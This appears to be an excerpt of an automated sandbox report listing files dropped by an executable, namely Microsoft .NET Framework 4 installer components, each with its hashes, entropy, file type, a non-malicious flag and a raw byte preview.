                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.l. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .n.o. .s.e. .p.u.e.d.e. .e.j.e.c.u.t.a.r. .e.n. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d... .P.a.r.a. .o.b.t.e.n.e.r. .m...s. .i.n.f.o.r.m.a.c.i...n.,. .v.e.a. .e.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.c.h.i.v.o. .L...a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.

                                                            C:\6c8944922f7b98d0b6cd82b768\3082\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.182140892959793
                                                            Encrypted:false
                                                            SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                            MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                            SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                            SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                            SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P............@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\3082\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3069
                                                            Entropy (8bit):5.138349598257165
                                                            Encrypted:false
                                                            SSDEEP:48:MTN3nfZQZXRFOTfyTZQDeK9xxMFcJ55HsUXHNX/RgMzsrMpDgLmqIy3W0b8EwKg3:MTBfZQZhoTfyTZQDeQxpDHsOH1ZvoMp9
                                                            MD5:D40C65F632063E5CDFEF104E324D0AD4
                                                            SHA1:49FABA625BADF413763BD913EDB62510D3790E98
                                                            SHA-256:AAD96E7F4037E977997C630DEC015ECF09CF73C1F5B73F84944E60B309EAAB66
                                                            SHA-512:6A948FA1602E517021C98861B0DF12FCB707FBBEBF094DDE96D9E60CC7DED30B07C1BF6CA8541117A362B5EB8703D61051CF187083C91076E0AD235CF72B7237
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang3082\b\f0\fs20 T\'c9RMINOS DE LICENCIA COMPLEMENTARIOS DEL SOFTWARE DE MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..Y PAQUETES DE IDIOMA ASSOCIADOS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, en funci\'f3n del lugar en el que resida, una de sus filiales) le concede la licencia para este complemento. Si obtiene la licencia para utilizar el sistema operativo Microsoft Windows (al que se aplica este suplemento), en adelante el "software", podr\'e1 usar e

                                                            C:\6c8944922f7b98d0b6cd82b768\Client\Parameterinfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):201796
                                                            Entropy (8bit):3.4097027044493644
                                                            Encrypted:false
                                                            SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                            MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                            SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                            SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                            SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .C.l.i.e.n.t. .P.r.o.f.i.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.

                                                            C:\6c8944922f7b98d0b6cd82b768\Client\UiInfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39042
                                                            Entropy (8bit):3.1132391675648923
                                                            Encrypted:false
                                                            SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                            MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                            SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                            SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                            SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.

                                                            C:\6c8944922f7b98d0b6cd82b768\DHtmlHeader.html

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16118
                                                            Entropy (8bit):3.6434775915277604
                                                            Encrypted:false
                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                            C:\6c8944922f7b98d0b6cd82b768\DisplayIcon.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):88533
                                                            Entropy (8bit):7.210526848639953
                                                            Encrypted:false
                                                            SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                            MD5:F9657D290048E169FFABBBB9C7412BE0
                                                            SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                            SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                            SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                            Malicious:false
                                                            Preview:..............(...............h...............h...f... .............. .............. ..........^...00......h....#..00..........n)..00...........8........ .h....T.. .... .....&Y..00.... ..%...i........ ._...v...(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l.............................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\Extended\Parameterinfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (409), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):93314
                                                            Entropy (8bit):3.379177079191028
                                                            Encrypted:false
                                                            SSDEEP:384:tYDmmqzP4JUaGMLiqedW0XeeUnG3GPcbrKFl:tRTaBG2PcbrIl
                                                            MD5:4A61E563A344188E3FDEB19C25197710
                                                            SHA1:BDD1E1774DB4CCE9D5393882B61F1360826C1DFA
                                                            SHA-256:7E682BDF51FAC1B3991E6E6330BBF5E7C63060053A8503DAAEA77AB5CD70888A
                                                            SHA-512:F898AC736AC8017624733BBE50C281239BB6F9472B04FB3459C428B22843637AACE99C6A4023ABBB537070F43A0A34FD900D19A4B90C001772C8A67467805801
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .E.x.t.e.n.d.e.d. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.g.M.u.t.e.x.

                                                            C:\6c8944922f7b98d0b6cd82b768\Extended\UiInfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39050
                                                            Entropy (8bit):3.114226586013312
                                                            Encrypted:false
                                                            SSDEEP:768:24URsd5vssgP7ZgZ/vSguJQvFQXvDINJh6Fuh3kr1UO0NWpPUb9cu+dOtOcOdOjQ:24URsd5vsTPuZXQYQLIN/6Fuh3kr1UOB
                                                            MD5:EC417B1688CA10739C0737B72BF07431
                                                            SHA1:A1CF21FD2183C1C4E308FB3C6600D5855BDB3E51
                                                            SHA-256:0452A6720E55B9D4E61225BB66016513DDE15CE9CC1FB305FC0037D008476787
                                                            SHA-512:B317C2985FCADC551F28791311966F9FDE1B854144723AFD449BE1280AB6D6D6CBE8D50FB113282C3DDB687BEC3048D7F93F2DD97AA63B596FA6C0C80A46481E
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Print.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):4.923507556620034
                                                            Encrypted:false
                                                            SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                            MD5:7E55DDC6D611176E697D01C90A1212CF
                                                            SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                            SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                            SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                            Malicious:false
                                                            Preview:............ .h.......(....... ..... .....@.........................................................................................t?.fR.|bN.y_K.v\H.rXD.oUA.kQ=.hN:.eK7.cI5.cI5.cI5i.........th<..z............................................cI5.cI5...................................................qXE.cI5.cI5.......~.............................................}eS.kR>.cI5......................................................q`.w^L.cI5..............................z..~n..sb..jX.{bP.t[H..~m..kY.nT@.......................................................{..wf.zaM.......vO.......................q..r`.}cQ.w]J..lZ.......t.x^J...........}Z..................................z`M........{aM...............0..............................jY.{aO...........................................................x^K.x^Kk.....................................................n\.y_L...........................r...............................y_L.x^K&.........................s.............

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate1.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5118974066097444
                                                            Encrypted:false
                                                            SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
                                                            MD5:26A00597735C5F504CF8B3E7E9A7A4C1
                                                            SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
                                                            SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
                                                            SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
                                                            Malicious:false
                                                            Preview:..............h.......(....... .......................................................................................................................................................................................t.r........................................p.nn.l|.z..........................................g.e.......................................................................................P.N..........................................P.OG.FP.O..........................................?.>...................................................................................................+.*..........................................3.2%.$+.*..........................................!. ............{.{.............................................................................................~.~..................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate2.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5178766234336925
                                                            Encrypted:false
                                                            SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
                                                            MD5:8419CAA81F2377E09B7F2F6218E505AE
                                                            SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
                                                            SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
                                                            SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
                                                            Malicious:false
                                                            Preview:..............h.......(....... ...............................................................................................................................................................................................................................................................................................................................................................................r.p..........................................q.oj.hq.o..........................................b.`...................................................................................................J.I..................|.|...y.y...............Q.PC.BF.E..........................................>.=.........".!..........................................2.1".!'.&..........................................".!.....................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate3.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5189797450574103
                                                            Encrypted:false
                                                            SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
                                                            MD5:924FD539523541D42DAD43290E6C0DB5
                                                            SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
                                                            SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
                                                            SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
                                                            Malicious:false
                                                            Preview:..............h.......(....... .................................................................................................................................................................................................................................................................................................................................................................................................................z.z...{.{...........................................................................................................................................................s.q..........................................y.wl.jl.j...............3.2#."*.)..................f.d.........E.D.........(.'..............................U.TE.DF.E..........................................E.D.....................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate4.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5119705312617957
                                                            Encrypted:false
                                                            SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
                                                            MD5:BB55B5086A9DA3097FB216C065D15709
                                                            SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
                                                            SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
                                                            SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
                                                            Malicious:false
                                                            Preview:..............h.......(....... .............................................................................................................................................................................................................y.y...|.|.............................................................................................................................................................................................................................................,.+".!,.+.........................................(.'......................................................................................=.<..........................................S.RC.BG.F.............................j.h.........H.G..............................y.wj.hi.g..........................................j.h.....................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate5.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5083713071878764
                                                            Encrypted:false
                                                            SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
                                                            MD5:3B4861F93B465D724C60670B64FCCFCF
                                                            SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
                                                            SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
                                                            SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
                                                            Malicious:false
                                                            Preview:..............h.......(....... .................................................................................................{.{...~.~.......................................................................................}.}.........................................................).(#."2.1..........................................).(...................................................................................................=.<..........................................N.ME.DN.M..........................................M.L.......................................................................................e.c..........................................z.xl.jm.k........................................r.p........................................................................................................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate6.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5043420982993396
                                                            Encrypted:false
                                                            SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
                                                            MD5:70006BF18A39D258012875AEFB92A3D1
                                                            SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
                                                            SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
                                                            SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
                                                            Malicious:false
